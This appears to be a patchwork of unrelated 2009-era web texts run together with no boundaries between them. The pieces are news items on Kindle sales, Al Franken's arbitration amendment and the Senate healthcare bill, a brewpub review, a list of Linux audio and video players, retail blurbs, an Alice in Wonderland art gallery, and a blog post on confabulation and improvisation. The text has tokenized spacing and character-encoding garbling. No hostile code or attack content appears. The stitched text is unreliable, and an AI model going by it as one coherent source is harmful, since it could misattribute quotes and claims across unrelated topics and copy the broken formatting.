The Seattle - based company 's top sellers in its home market included Apple 's iPod touch , Scrabble Slam Cards , Nintendo's Wii Fit Plus with balance board , the latest Harry Potter DVD , Sarah Palin 's book Going Rogue and Susan Boyle 's album , I Dreamed a Dream .
Although Amazon has repeatedly trumpeted " record - breaking " Kindle sales , it has refused to say exactly how many have been sold since the 2007 launch .
Sandeep Aggarwal , an analyst with Collins Stewart in New York who has tracked the Kindle 's performance , believes that across both models – the paperback - sized Kindle 2 and larger DX – Amazon may be on target to have sold a little over 500,000 units by the end of the year .
Nor does it divulge data about the Kindle - compatible books it sells from a Kindle Store that now includes more than 390,000 titles .
After first taking off in the US , e-readers are becoming increasingly popular in the UK and the Kindle went on sale in Britain in mid-October .
The department store chain John Lewis highlighted the popularity of e-readers this Christmas , reporting a jump in sales of Sony 's eBook readers .
British publishers have also been exploring the market for electronic versions of books in the hope of enjoying strong sales when e-book stores and reading devices achieve critical mass in the coming years .
The Harry Potter publisher Bloomsbury made the 2009 Wisden Cricketers '
Almanack available as an e-book for the first time this year , while Penguin has been selling a range of its classics in electronic form with extra features such as contemporary recipes .
Today in the US and next month in Europe , DSi owners will be able to download an arcade - perfect port of the Don Bluth animated classic , Dragon ’s Lair .
With any luck , it ’ll work better than the 3DO version and we can look forward to many an insta-death but this time without popping quarter after quarter into an arcade machine .
See the trailer after the jump .
The office of Illinois lieutenant governor is so inconsequential that in 1981 Dave O’Neal resigned rather than endure the drudgery of finishing his term .
Image Scott Lee Cohen Credit ...
Jose More / Chicago News Cooperative
Yet Scott Lee Cohen , a Chicago businessman , said this month that he was willing to spend up to $ 3 million of his money to win the office .
It would be an unprecedented outlay for a position that mainly involves cutting ribbons , giving speeches and searching for political relevance .
Mr. Cohen said he saw the office  vacant since Patrick J. Quinn was elevated to governor in January  as a way to prompt job creation and “ get things done I could n’t do as a private citizen . ”
Al Franken is n't doing much to stop partisans on the left from using a measure he sponsored to paint Republicans as rapist sympathizers .
Franken fallout has GOP fuming
Republican senators feel burned by Al Franken — and not by his old jokes .
The Republicans are steamed at Franken because partisans on the left are using a measure he sponsored to paint them as rapist sympathizers — and because Franken is n’t doing much to stop them .
“ Trying to tap into the natural sympathy that we have for this victim of this rape — and use that as a justification to frankly misrepresent and embarrass his colleagues , I do n’t think it ’s a very constructive thing , ” Sen . John Cornyn ( R - Texas ) said in an interview .
Advertisement
“ I think it ’s going to make a lot of senators leery and start looking at things he ’s doing earlier on , because I do n’t think it got appropriate attention ahead of time . ”
In a chamber where relationship - building is seen as critical , some GOP senators question whether Franken ’s handling of the amendment could damage his ability to work across the aisle .
Soon after Tennessee GOP Sens .
Bob Corker and Lamar Alexander co-wrote an op -ed in a local newspaper defending their votes against the Franken measure , the Minnesota Democrat confronted each senator separately to dispute their column — and grew particularly angry in a tense exchange with Corker .
People familiar with the Corker exchange say it was heated and ended abruptly — a sharp departure from the norm on the usually clubby Senate floor .
At issue is an amendment to the Pentagon spending bill that would bar “ future and existing ” federal contracts to defense contractors and subcontractors “ at any tier ” who mandate employees go through a company ’s arbitration process for workplace discrimination claims — including claims of sexual assault .
The measure passed 68 - 30 , with 10 Republicans voting yes and 30 voting no .
Franken , who declined to be interviewed , has said previously that the measure was inspired by the story of former KBR employee Jamie Leigh Jones , who alleges that she was drugged , beaten and gang - raped at age 19 when stationed in Baghdad .
She fought the arbitration clause in her contract , and in September the U.S. Court of Appeals for the 5th Circuit ruled that Jones ’s sexual assault allegations were not “ related to ” her employment , allowing her to proceed in court .
KBR is fighting the ruling .
As a comedian , talk show host and best - selling author , Franken showcased his ability to dress down Republicans with devastating attacks .
Since becoming a senator in July , Franken has publicly tried to maintain a distance from that image — and aides are quick to note that Franken had nothing to do with coordinating the barrage of attacks waged against the Republicans .
But some of his new Republican colleagues argue that the amendment is being grossly mischaracterized — and has spawned attacks like the satirical website RepublicansforRape.org — and now question whether Franken is doing a good job of separating his past from his current line of work .
“ I do n’t know what his motivation was for taking us on , but I would hope that we wo n’t see a lot of Daily Kos-inspired amendments in the future coming from him , ” said South Dakota Sen .
John Thune , No. 4 in the Senate Republican leadership .
“ I think hopefully he ’ll settle down and do kind of the serious work of legislating that ’s important to Minnesota . ”
Aides point out that despite attacks on Republicans by liberal commentators like Rachel Maddow and Keith Olbermann and on blogs such as Daily Kos , Franken never appeared on any of the shows or on the blogs to make a partisan argument about the matter , saying that the senator turned down entreaties to do so .
Also , they point to the 10 Republicans who voted for the amendment as proof that it was n’t a partisan measure .
“ Sen . Franken has been proud to partner with both Republicans and Democrats to find common - sense solutions to the problems we face , ” said Jess McIntosh , his spokeswoman .
“ He ’s been working hard for Minnesota since he got here five months ago and has already introduced 10 bills — four of which were introduced with Republican co-sponsors , and two already passed the Senate with broad bipartisan support . ”
But some Republicans are not buying it , seeing what they say are unfair attacks launched against them .
Sen. Kit Bond ( R - Mo. ) , who also voted against the amendment , said , “ from what I know of ” Franken , he “ expected ” such tactics .
Beneath the personal story and the partisan recriminations is a long - simmering dispute between trial lawyers and the business lobby , with trial lawyers arguing that mandatory arbitration clauses stack the decks against employees , and business groups arguing that arbitration is the fairest , most expeditious and least expensive way to deal with complaints and that mandatory arbitration evens the playing field .
Franken ’s office contends that the bill language is narrowly tailored to affect situations in which employers mandate that employees ’ sexual assault claims go through arbitration .
But critics say the language was loosely written and could cover a wide range of employment - related disputes and flood the court system with tens of thousands of additional claims .
The Defense Department raised concerns about the enforceability of the Franken amendment , as well as its potential to unravel contracts — and urged senators to vote against it .
It now awaits its fate in the conference committee .
Given the nuance of the debate , Republicans argue that Franken should make it clear that GOP senators do n’t support assault or rape — especially since the amendment deals only with civil claims , making it possible for alleged rapists to be prosecuted criminally .
“ I think it would be helpful for Sen .
Franken to come forward and say , ‘ I ’m not suggesting that anybody who votes for my amendment is indifferent to crimes against women or anybody else , ’ ” said Sen. Lindsey Graham ( R - S.C. ) , who voted against the amendment .
“ What ’s going on politically with the amendment Sen .
Franken ca n’t control , but I think it would be helpful for him personally to just let the rest of us know that ’s the views of others — not him . ”
Graham added that he had a “ good relationship ” with Franken and did n’t question the Democrat ’s motivations .
Sen. Johnny Isakson ( R - Ga. ) , who co-authored a bill with Franken to ensure that veterans receive access to service dogs , said Franken ’s “ motivations were good ” on that plan .
But when asked about the defense contractor amendment , Isakson said “ that ’s another question , ” declining to speculate about Franken ’s motivations .
Franken has gotten into heated arguments before with Republicans , including with T. Boone Pickens , whom Franken reportedly slammed at a Democratic policy lunch this summer for helping finance the Swift Boat Veterans for Truth attacks against Sen.
John Kerry in the 2004 presidential campaign .
Corker ’s exchange with Franken grew heated as well , but McIntosh declined to comment on that .
In an interview , Corker acknowledged that Franken confronted him on the floor , but he declined to characterize the talk other than to say he disagreed with Franken ’s arguments .
On their relationship , Corker said : “ We serve together on an Aging Committee — I say hello when we see each other . ”
Alexander said his exchange with Franken about the op - ed was n’t unusual since the two men had a “ very good ” breakfast the day before .
He said that he argued his point to Franken but did n’t want to question Franken ’s motivations .
Others are not as convinced that Franken was staying above politics .
“ It was partisan — and he knew it , ” said Sen . Tom Coburn ( R - Okla . ) .
“ That ’s exactly what I ’d expect . ”
But Democrats say Franken is n’t doing anything other than trying to find solutions to thorny issues .
“ He has been an exemplary legislator , ” said Sen. Chuck Schumer ( D - N.Y. ) , who helped urge Franken to run in 2008 .
“ When you ’ve never been a legislator , it takes a long time to learn it .
He ’s one of the quickest studies and best at it that I have seen . ”
McIntosh , the Franken spokeswoman , said that her boss wants every Republican to support the amendment .
“ Jamie Leigh ’s story resonated with a lot of people , and correcting this wrong in our system means a lot to them , ” McIntosh said .
Alice in Wonderland is a novel written by English author Charles Lutwidge Dodgson under the pseudonym Lewis Carroll .
It tells the story of a girl named Alice who falls down a rabbit hole into a fantasy world populated by peculiar and anthropomorphic creatures .
The film will be remade by Disney and is due for release on March 5 , 2010 in Disney Digital 3 - D and IMAX 3 - D as well as in regular theaters .
Alice , as the main character of the novel , is popularly depicted wearing a pale blue knee - length dress with a white pinafore overtopping .
While in paintings of other illustrations , there are a few changes , including her attire , manner and personality .
We have collected works from different illustrators , and of course , not only about Alice but also other main characters as the Caterpillar , Mad Hatter , White Rabbit , Cheshire Cat , Queen of Hearts .
Enjoy it .
Design by Olatz ( Left ) , Emily ( Right )
Design by Eva Soulu
Design by Luke Mancini ( Left ) , RobbVision ( Right )
Design by Raye
Design by Nei Ruffino
Design by Mirko Cogo
Design by Eric
Design by David Nakayama ( Left ) , Lighterheaven ( Right )
Design by Sonny Liew
Design by kyoung Hwan Kim
Design by Annie Rodrigue
Design by Takkaya
Design by Kanmi ( Left ) , Aomori ( Right )
Design by King Rastel
Design by Michael Kutsche ( Left ) , Mercurialeye ( Right )
Design by Lois Van Baarle
Design by Splitlipgypsy ( Left ) , Eddie Nunez ( Right )
Design by Mim
Design by Rego Chan ( Left ) , Owdof ( Right )
Design by Ralph Horsley
Design by Yveline ( Left ) , Sandra ( Right )
Design by Jennifer Duong ( Left ) , Jennifer ( Right )
Design by Kristoffer
Design by JBrianna Garcia ( Left ) , SkyFinch ( Right )
Design by Kanmi
Boundary Bay Brewery and Bistro – Bellingham , WA
After nearly two weeks off with the flu , I was more than ready to hit the road for a quick Good Beer Trip .
We headed 90 miles north from Seattle to Bellingham , Washington .
Home to our Alma Mater Western Washington University , where Lush C and I first met , and two great breweries ; Boundary Bay and Chuckanut .
We make it to Bellingham about 10 times a year , and split our visits between the two .
This trip we opted for Boundary Bay Brewery and Bistro .
Boundary Bay is by far one of our favorite brewpubs .
Their beer is exceptional , the atmosphere is great , and their food is tasty .
Their only downside is that their service is hit and miss ( after a rushed start we got good service this visit ) .
It is located in an old brick building in downtown B’ham .
You have the choice to sit in 21 + pub , the family friendly dining room , or the outdoor patio / deck ( during the summer months ) .
We prefer to sit in the pub , and on this trip we were lucky to find a table .
The pub is large and open , with high ceilings with a small bar area that has good view of the the glass enclosed brewery .
They theme is nautical with a sail on the ceiling and a small boat on the wall .
On this visit , they were decorated for the holidays with a large tree decked with cool glass ornaments that looked like pints and growlers , wreaths , and lights .
Their menu is full of local , organic and natural pub fare of sandwiches , burgers , pizza , soups and salads .
You may notice the lack of fries , but their roasted potatoes fill the void , and are tasty .
Lush C opted for the Salmon Sandwich and I went for the Beef Stew .
Both were very yummy .
Now , onto the main event , the Beer .
Lush C did n’t waste any time and ordered a Cabin Fever , and I decided to get their six beer sampler .
Beer Sampler :
Blonde – a cloudy blonde with a slight fruity aroma .
Light bodied malt flavor with a slight peppery floral finish .
Decent , but not a favorite of mine .
ESB , Best Bitter – Orange with a sweet floral aroma .
Sweet and malty with a hoppy finish .
A near perfect session beer if it were only a little better balanced .
Inside Passage IPA – Cloudy orange with a floral aroma .
Nicely balanced malt with a floral hop finish .
A classic Northwest IPA .
Amber – light amber with a citrus floral aroma .
A smooth roasted malt flavor with a enough hops to keep it from being to sweet .
Very well balanced .
Scotch – Dark amber with a sweet aroma .
Very well balanced .
Sweet , but not to sweet , malty and just enough hops .
A favorite of Lush C’s .
Imperial Oatmeal Stout – Dark Black with a sweet alcohol aroma .
Medium bodied , sweet and malty with a hint of chocolate and a sublte hop flavor .
Not overly complex , but still delightful .
Cabin Fever ( English Strong Ale ) – nice auburn brown with a sweet carmel aroma .
Full bodied , malty , sweet , slight hops and a hint of spice .
Very smooth and well balanced .
It gets the job done !
A nice Winter Warmer .
Disclaimer : Goodbeertrips.com is in no way affiliated with the Boundary Bay Brewery and Bistro .
All beer and food was paid for by Goodbeertrips.com .
First the floor behind the bar collapses , then the whole bar falls thru .
No further info on the clip .
except apparently this was not due to an erthquake .
The clip is shaky because it's a cell phone video of a CCTV - recording .
Sponsored Link
This is list of Audio / Video players available for GNOME / KDE Users
Alsaplayer is a PCM player designed specifically for use with ALSA , but works great with OSS or EsounD .
It 's heavily threaded which cuts down on skipping , offers optional and even simultaneous visual scopes , plays mp3 , mp2 , ogg , cdda , audiofs , and lots more .
This package provides a GTK - based interface to alsaplayer .
Project Homepage :-- http://www.alsaplayer.org/
Latest Stable Version :- 0.99.80
Amarok
Amarok is a sound system - independent audio - player for Unix .
Its interface uses a powerful " browser " metaphor that allows you to create playlists that make the most of your music collection .
Project Homepage :-- http://amarok.kde.org/
Latest Stable Version :-- 2.2
Aqualung
Aqualung is an advanced music player originally targeted at the GNU / Linux operating system , today also running on FreeBSD and OpenBSD , with native ports to Mac OS X and even Microsoft Windows .
It plays audio CDs , internet radio streams and podcasts as well as soundfiles in just about any audio format and has the feature of inserting no gaps between adjacent tracks .
Project Homepage :-- http://aqualung.factorial.hu/
Latest Stable Version :-- 0.9beta10
Audacious
Audacious is an advanced audio player .
It is free , lightweight , based on GTK2 , runs on Linux and many other * nix platforms and is focused on audio quality and supporting a wide range of audio codecs .
Its advanced audio playback engine is considerably more powerful than GStreamer .
Audacious is a fork of Beep Media Player ( BMP ) , which itself forked from XMMS .
Project Homepage :-- http://audacious-media-player.org/
Latest Stable Version :-- 2.1.0
Banshee
Banshee is an media management and playback application for the GNOME desktop , allowing users to import audio from CDs , search their library , create playlists of selections of their library , sync music to / from iPods and other media devices , play and manage video files and burn selections to a CD .
Project Homepage :-- http://banshee-project.org/
Latest Stable Version :-- 1.4.3
Beep media player
BMP
Is a versatile and handy multi platform media player
Project Homepage :-- http://sourceforge.net/projects/beepmp/
Latest Stable Version :-- 0.20pre2
Cactus
Cactus Jukebox is an audio player and music organizing tool .
It searches given folders for music files and shows them in a database .
Project Homepage :-- http://cactus.hey-you-freaks.de
Latest Stable Version :-- 0.4.2
cmus
cmus is a small and fast text mode music player for Linux and many other UNIX like operating systems .
Project Homepage :-- http://cmus.sourceforge.net/
Latest Stable Version :-- 2.2.0
Decibel
Decibel Audio Player is a GTK + open - source ( GPL license ) audio player designed for GNU / Linux , which aims at being very straightforward to use by mean of a very clean and user friendly interface .
It is especially targeted at Gnome and follows as closely as possible the Gnome HIG .
Project Homepage :-- http://decibel.silent-blade.org/
Latest Stable Version :-- 1.01
Exaile
Exaile is a music manager and player for GTK + written in Python .
It incorporates automatic fetching of album art , lyrics fetching , artist / album information via Wikipedia , Last .fm scrobbling , support for many portable media players including iPods , internet radio such as shoutcast , and tabbed playlists .
Project Homepage :-- http://www.exaile.org/
Latest Stable Version :-- 0.3.0.1
Freevo
Freevo is an open source HTPC media centre software integrating PVR / DVR funtionality along with music , video , gaming , home automation and more .
It is written in python and uses existing popular software such as mplayer , xine and vlc .
Primarily aimed at the Linux platform it is also possible to run on OSX and for the determined on Windows .
It is the main mythtv alternative .
Project Homepage :-- http://freevo.sourceforge.net/
Latest Stable Version :-- 1.9.0
Helix - player
The Helix Player is an open source media player for Linux , Solaris , and Symbian based on the Helix DNA Client media engine .
More operating system versions are currently in development .
Project Homepage :-- https://player.helixcommunity.org/
Latest Stable Version :-- 11.0
Juk
JuK is a free software audio player for KDE , the default player since KDE 3.2 part of the kdemultimedia package .
JuK supports collections of MP3 , Ogg Vorbis , and FLAC audio files .
Project Homepage :-- http://developer.kde.org/~wheeler/juk.html
Latest Stable Version :-- 2.2
kaffeine
Kaffeine is full featured Media Player for KDE .
It supports all kinds of local and network media and digital video broadcasting ( DVB ) .
At the moment Kaffeine can use xine - lib or GStreamer as backend .
Project Homepage :-- http://kaffeine.kde.org/
Latest Stable Version :-- 1.0-pre2
Listen
Listen is an audio player written in Python .
Thanks to it , you can easily organize your music collections .
Project Homepage :-- http://www.listen-project.org/
Latest Stable Version :-- 0.6.3
Mesk
Mesk is a PyGtk+ audio player that supports multiple playlists and plugins .
Project Homepage :-- http://mesk.nicfit.net/
Latest Stable Version :-- 0.3.2
Mplayer
It plays most mpeg , avi and asf files , supported by many native and win32 DLL codecs .
You can watch VCD , DVD and even DivX movies too .
The other big feature of mplayer is the wide range of supported output drivers .
It works with X11 , Xv , DGA , OpenGL , SVGAlib , fbdev , but you can use SDL ( and this way all drivers of SDL ) and some lowlevel card - specific drivers ( for Matrox / 3dfx / SiS ) too !
Most of them supports software or hardware scaling , so you can enjoy movies in fullscreen .
Project Homepage :-- http://www.mplayerhq.hu
Latest Stable Version :-- 1.0rc2
MPD
Music Player Daemon ( MPD ) is a flexible , powerful , server - side application for playing music .
Through plugins and libraries it can play a variety of sound files while being controlled by its network protocol .
Project Homepage :-- http://mpd.wikia.com/wiki/Music_Player_Daemon_Wiki
Latest Stable Version :-- 0.15.4
sonata GTK frontend MPD
Mpg123
mpg123 is a real time MPEG 1.0/2.0/2.5 audio player / decoder for layers 1,2 and 3 ( MPEG 1.0 layer 3 aka MP3 most commonly tested ) .
Among others working with Linux , MacOSX , FreeBSD , SunOS4.1.3 , Solaris 2.5 , HPUX 9.x , SGI Irix and Cygwin or plain MS Windows .
It is free software licensed under LGPL 2.1 ( the officially released sources , some files in subversion repository may differ ) .
Project Homepage :-- http://www.mpg123.de/
Latest Stable Version :-- 1.9.1
Muine
Muine is an innovative music player .
It has a simple interface designed to allow the user to easily construct a playlist from albums and / or single songs .
Its goal is to be simply a music player , not to become a robust music management application .
Project Homepage :-- http://muine-player.org/wiki/Main_Page
Latest Stable Version :-- 0.8.11
Quodlibet
Quod Libet is a GTK +- based audio player written in Python , using the Mutagen tagging library .
It 's designed around the idea that you know how to organize your music better than we do .
It lets you make playlists based on regular expressions ( do n't worry , regular searches work too ) .
It lets you display and edit any tags you want in the file .
And it lets you do this for all the file formats it supports --- Ogg Vorbis , FLAC , MP3 , Musepack , and MOD .
Project Homepage :-- http://code.google.com/p/quodlibet/
Latest Stable Version :-- 2.1
Rhythmbox
Rhythmbox is an integrated music management application , originally inspired by Apple 's iTunes .
It is free software , designed to work well under the GNOME Desktop , and based on the powerful GStreamer media framework .
Project Homepage :-- http://projects.gnome.org/rhythmbox/
Latest Stable Version :-- 0.12.5
Songbird
Songbird is an open - source customizable music player that 's under active development .
Project Homepage :- http://www.getsongbird.com/
Latest Stable Version :-- 1.2.0
SMPEG GTK + MPEG audio / video player
SMPEG ( SDL MPEG Player Library ) is a free MPEG1 video player library with sound support .
Video playback is based on the ubiquitous Berkeley MPEG player , mpeg_play v2.2 .
Audio is played through a slightly modified mpegsound library , part of splay v0.8.2 .
SMPEG supports MPEG audio ( MP3 ) , MPEG - 1 video , and MPEG system streams .
This package contains a GTK + player called gtv .
Totem
Totem is the official movie player of the GNOME desktop environment based on GStreamer .
It features a playlist , a full - screen mode , seek and volume controls , as well as keyboard navigation .
Project Homepage :-- http://projects.gnome.org/totem/
Latest Stable Version :-- 2.28
VideoLan/VLC
VLC media player is a highly portable multimedia player and multimedia framework capable of reading most audio and video formats ( MPEG - 2 , MPEG - 4 , H.264 , DivX , MPEG - 1 , mp3 , ogg , aac ... ) as well as DVDs , Audio CDs VCDs , and various streaming protocols .
Project Homepage :-- http://www.videolan.org/vlc/
Latest Stable Version :-- 1.0
XBMC
XBMC has gone a long way since its first stable release in 2004 .
It has evolved from a xbox only application into a sleek cross platform media center that runs on almost anything you throw it at .
XBMC has thousands of users , is the mother of many successful derivative projects and commercial spin -offs and is written about in the international press on a regular basis .
Project Homepage :-- http://xbmc.org/
Latest Stable Version :-- 9.04.1
ximp3
Ximp3 is a console music player .
It is based on the GPL 'ed Xing decoder also used in FreeAmp .
Project Homepage :-- http://matsp888.tripod.com/
Latest Stable Version :-- 0.1.15
Xine
xine is a free multimedia player .
It plays back CDs , DVDs , and VCDs .
It also decodes multimedia files like AVI , MOV , WMV , and MP3 from local disk drives , and displays multimedia streamed over the Internet .
It interprets many of the most common multimedia formats available – and some of the most uncommon formats , too .
Project Homepage :-- http://www.xine-project.org
Latest Stable Version :-- 1.1.16
XMMS
XMMS is a legacy GTK+1 music player modeled after Winamp .
Project Homepage :-- http://www.xmms.org/
Latest Stable Version :-- 1.2.11
Youki
Youki is the current media player of the MPX Project .
Previous media players produced by the team were Beep Media Player , BMPx , and the never officially released audiosource .
Youki is a free software media player for most modern Unix operating systems .
Project Homepage :-- http://youki.mp/
Latest Stable Version :-- 0.05.2
If you know something is missing from this list plaese let us know .
In the next article we will see how to install these players in ubuntu .
Sponsored Link
Related posts
Welcome to KarateMart.com
As the leading retailer in martial arts supplies , karate gi martial arts weapons , and all things awesome , we pride ourselves in being able to provide a truly unique and enjoyable shopping experience to our visitors .
How do we do this ?
Easy .
At KarateMart.com , we adhere to a customer - focused policy that makes YOU our number one priority .
What does that mean to you ?
Put simply : A vast collection of martial arts items and karate weapons that are just one click away from reliable , ninja - fast shipping to your doorstep !
We know martial artists have a wide range of tastes , so we try to offer something for everyone .
We also know that the only thing more important to you than finding a great piece of gear is getting it QUICKLY .
That 's why every order we receive becomes a top priority to our shipping team .
We do our best to process all of our orders same - day .
If for any reason there is a delay with your order , one of our top customer service representatives will contact you immediately .
A real , live human ?
Yep , that 's how we roll .
Want to stay privy to all of the best deals on martial arts gear , karate uniforms and new ninja weapons ?
Scroll down to our KarateMart.com newsletter sign up and send your email address our way .
It 's the best way to stay in the loop .
Also , do n't forget to visit us on Facebook , Twitter , Instagram , and all the usual social channels .
We love friends !
Have questions about KarateMart.com ?
Head over to our FAQ section .
Yes , Lost producers Carlton Cuse and Damon Lindelof have asked ABC " pretty please with sugar on top " that they not use any Season 6 footage for their network promos for Season 6 .
But that does n't mean that you can't use old footage in new and exciting ways .
Take Spain 's Cuatro channel for example .
They 've put together a new promo to hype the final season of Lost ( aka Perdidos ) .
Just take a giant chessboard , throw in Radiohead 's " Everything in its Right Place " and slam down a giant statue and - " blammo ! " - you 've got yourself a cool little video .
About Baby Guard Pool Fence Company .
Baby Guard Pool Fence Company is one of the largest and most trusted manufacturers of pool safety fencing in the United States .
We have been leading the industry since its inception in 1995 .
Baby Guard believes it has the safest , most affordable pool fences available today .
Our fences can be customized to fit any size pool .
Baby Guard fences are available in either 4 or 5 foot heights and can be installed on nearly all deck surfaces including brick pavers , wood , tile , grass or dirt , seawalls , acrylic and more .
At Baby Guard , we do n’t just make great child fences , we also help protect pets and the elderly from falling into the pool .
Baby Guard Pool Fence Company recommends a self - closing gate that will swing shut and is key - lockable .
Baby Guard pool fences are available in a variety of colors and styles to match your outdoor color scheme .
All Baby Guard pool fences are 100 % rust - proof and come with a limited manufacturer ’s warranty .
In a victory for President Obama and his allies in the pharmaceutical industry , the Senate today turned aside a bid by a bipartisan group of lawmakers to make it easier to import cheaper prescription drugs from Canada and Western Europe -- a proposal that threatened to derail the Democrats ’ landmark healthcare bill .
The vote on the amendment -- cosponsored by Sens. Byron Dorgan ( D - N.D. ) and John McCain ( R - Ariz . ) -- was 51 - 48 , nine short of the 60 needed to pass .
The politically charged amendment held up the Senate for a week as drug companies , the White House and lawmakers from states that are home to drug makers fought to derail the proposal .
Critics , including the Food and Drug Administration , said it would be difficult to implement and hard to guarantee that imported drugs would be safe .
Further adding to the momentum for final Senate approval of the massive healthcare bill , Obama and many liberal Democrats rallied behind the decision to put aside a goal liberals had long held as an article of faith -- a new government health insurance plan to compete with the private sector .
Obama summoned Senate Democrats to the White House today to urge them not to let disagreements over details of the legislation derail or delay the landmark effort .
“ This reform has to pass on our watch , ” the president said .
“ We are on the precipice of an achievement that has eluded Congresses and presidents for decades . ”
While some liberals mourned the capitulation that has long seemed inevitable , leaders of several progressive groups signaled that they would support the strategy for now rather than risk stalling their drive .
“ The final bill wo n’t include everything that everybody wants , ” Obama said .
The president weighed in at a critical moment , as Senate Majority Leader Harry Reid ( D - Nev. ) was working to unite their party in advance of key votes on the compromise that did not include the so - called “ public option ” -- a new government - run health insurance plan -- or an alternative plan to expand Medicare , which was popular with liberals .
A vast array of details have yet to be pinned down , but the framework of the Senate bill came into view as Reid pushed the Senate to finish work before Christmas .
The sense of gathering momentum was fueled as disputes on other issues were resolved : Behind - the - scenes negotiations continued to resolve differences among Democrats over restrictions on federal funding for abortion .
The drug amendment had in the past enjoyed broad support from Democrats -- including Obama -- but the White House and Senate leaders bowed to the pharmaceutical industry and joined their effort to derail it .
The administration feared that if the amendment had passed , pharmaceutical companies , which earlier this year struck a deal with the White House to limit the economic impact of a healthcare overhaul on their industry , would turn against the broader health legislation .
To appease critics , Reid pledged this week to work with House leaders to ensure that a final bill would close the so - called Medicare doughnut hole , a gap in prescription drug coverage that forces millions of seniors to pay for thousands of dollars of drugs out of their own pockets .
On the broader questions , Reid plans to unveil the details of his final compromise Wednesday after receiving an official report on its costs and impact .
After that , Reid is expected to begin the complex procedural steps required to cut off Republicans ’ filibuster , with the first of a series of crucial votes coming as early as Friday .
Without any GOP support , all 60 lawmakers in the Democratic caucus , including two independents , will have to vote for the procedural motions in order for the bill to advance .
It will then have to be reconciled with a version passed last month by the House , a stronger bulwark of liberalism than the Senate .
House Democrats welcomed the apparent end of the Senate ’s stalemate on the legislation , but were not happy about the drift of its compromises .
“ We in the House have made a beautiful souffle , but the Senate has scrambled an egg , ” said Rep. George Miller ( D - Martinez ) , noting that Reid already had said he expected to go along with the House in closing the Medicare doughnut hole .
“ Let ’s hope they will find more they like in the House bill . ”
Some liberals pledged to vote against the bill if it is in the Senate mold , but Democratic leaders steered clear of such ultimatums .
House Majority Leader Steny Hoyer ( D - Md. ) told reporters that the House could pass the health bill without a public option , contrary to earlier warnings .
That was in keeping with advice Democrats say they received long ago from Obama lieutenants like Chief of Staff Rahm Emanuel , who argued that passing any bill would be better than failing to act .
“ Rahm told us months ago : Everything can be compromised except our ultimate goal of getting something done , ” said Rep. Jim Moran ( D - Va. ) .
“ Everything else is negotiable . ”
And liberals acknowledged they were in a weak bargaining position because conservatives were willing to kill the bill over their disagreements -- and Democrats were not .
“ We progressives are negotiating with a gun to our heads , ” said Rep. Anthony Weiner ( D - N.Y . ) .
“ Our opponents are saying , ‘ Go ahead and shoot . ’
If you ’re a public option fan , you have n’t had a good week . ”
The final push for Senate action picked up important support today from several leading consumer groups , including AARP , the American Cancer Society Cancer Action Network , Consumers Union and Families USA .
The groups plan to join the Service Employees International Union , which has been a leading advocate for a new government insurance plan , at the Capitol on Wednesday to urge senators to quash a Republican - led filibuster next week .
And Health Care for America Now , the influential coalition of liberal activist groups , today decided to send a letter to Reid calling for passage of the legislation , the group ’s campaign manager Richard Kirsch said .
“ There are major problems with the Senate bill , ” Kirsch said in an interview today .
“ But if the Senate does n’t act , there will be no healthcare reform .
. . .
The place to fix [ the Senate bill ] is in a conference committee ” with House and Senate leaders at the table .
The White House meeting came one day after Senate Democrats moved to back down from the idea of expanding Medicare in lieu of the public option , bowing to opposition from conservative Democrats and independent Sen. Joe Lieberman of Connecticut .
Democrats were infuriated at Lieberman because he had supported the expansion of Medicare in the past , but the White House tried to defuse that anger .
“ If we held flip - flops against everybody in the Congress , we ’d probably not have many people there , ” Vice President Joe Biden said in an interview on MSNBC ’s “ Morning Joe ” program .
Lieberman joined Obama and Democrats at the White House and signaled that he planned to vote for the bill , according to sources briefed on the meeting .
Obama urged others to see the glass as half full , emphasizing that the legislation , like the landmark 1965 law that created Medicare , is a foundation for further improvements in the future .
“ Be joyful ; be grateful , ” Obama said , according to Senate Finance Committee Max Baucus ( D - Mont . ) .
“ We ’ll build upon it in the future . ”
In his public comments after the meeting , he said that the emerging Senate bill meets the major criteria he set out in a healthcare speech before a joint session of Congress :
It would expand coverage , does not add to the deficit , and slows the rate of growth of healthcare costs .
Beyond that , Obama said , “ We simply cannot allow differences over individual elements of this plan to prevent us from meeting our responsibility to solve a long - standing and urgent problem for the American people , ” Obama said .
“ They are waiting for us to act .
They are counting on us to show leadership .
And I do n’t intend to let them down . ”
Neither does as staunch a liberal as Sen. Sherrod Brown ( D - Ohio ) , who has steadfastly refused to compromise on including a public option .
He said after meeting with Obama that he would vote for the bill despite his reservations .
“ There is too much at stake , ” he said .
“ And it ’s about me .
It ’s not about any senator .
It ’s not about Lieberman . ”
noam.levey@latimes.com
janet.hook@latimes.com
Originally published earlier this year in Prospect magazine , Tom has put a copy of his fantastic article online where he discusses our capacity for improvisation and how it links with a post - brain damage condition call confabulation where patients seem unable to stop themselves inventing unlikely stories .
Confabulation occurs most typically after frontal lobe damage and causes patients to give clearly false information either spontaneously or when they ’re asked a question without any obvious intention to deceive the questioner .
It ’s generally thought to be a problem with retrieving memories .
The idea is that , initially , remembering activates a whole load of loosely associated information and then a filtering processes narrows it down to only the most relevant and likely memories .
Confabulation is thought to occur when brain damage impairs this filtering process so patients will recount incoherent information because they can’t easily distinguish between likely memories and other the contents of their mind .
Tom discusses how , in healthy people , the strength of this filtering process could be ‘ turned down ’ to allow theatrical improvisation and instant creativity .
In those patients with frontal damage who do confabulate , however , the brain injury makes them rely on their internal memories ‚Äîtheir thoughts and wishes ‚Äîrather than true memories .
This is of course dysfunctional , but it is also creative in some of the ways that make improvisation so funny : producing an odd mix of the mundane and impossible .
When a patient who claims to be 20 years old is asked why she looks about 50 , she replies that she was pushed into a ditch by her brothers and landed on her face .
Asked about his good mood , another patient called Harry explains that the president visited him at his office yesterday .
The president wanted to talk politics , but Harry preferred to talk golf .
They had a good chat .
Improvisers tap into these same creative powers , but in a controlled way .
They learn to cultivate a ‚ Äúdual mind , ‚Äù part of which doesn ‚
Äôt plan or discriminate and thus unleashes its inventive powers , while the other part maintains a higher level monitoring of the situation , looking out for opportunities to develop the narrative .
In fact , this is in line with work on Jazz musicians that we discussed last year .
This particular study found that activity in the dorsolateral prefrontal cortex ( DLPFC ) – a large chunk of the frontal lobes – reduces during Jazz improvisation , suggesting that the mental controls are eased up allowing a more free flowing mental style .
Link to Tom ’s Prospect article ‘ Tall Stories ’ .
It is already a 30 - year war begun by one Democratic president , and thanks to the political opportunism of the current commander in chief the Afghanistan war is still without end or logical purpose .
President Barack Obama ’s own top national security adviser has stated that there are fewer than 100 al - Qaida members in Afghanistan and that they are not capable of launching attacks .
What superheroes they must be , then , to require 100,000 U.S. troops to contain them .
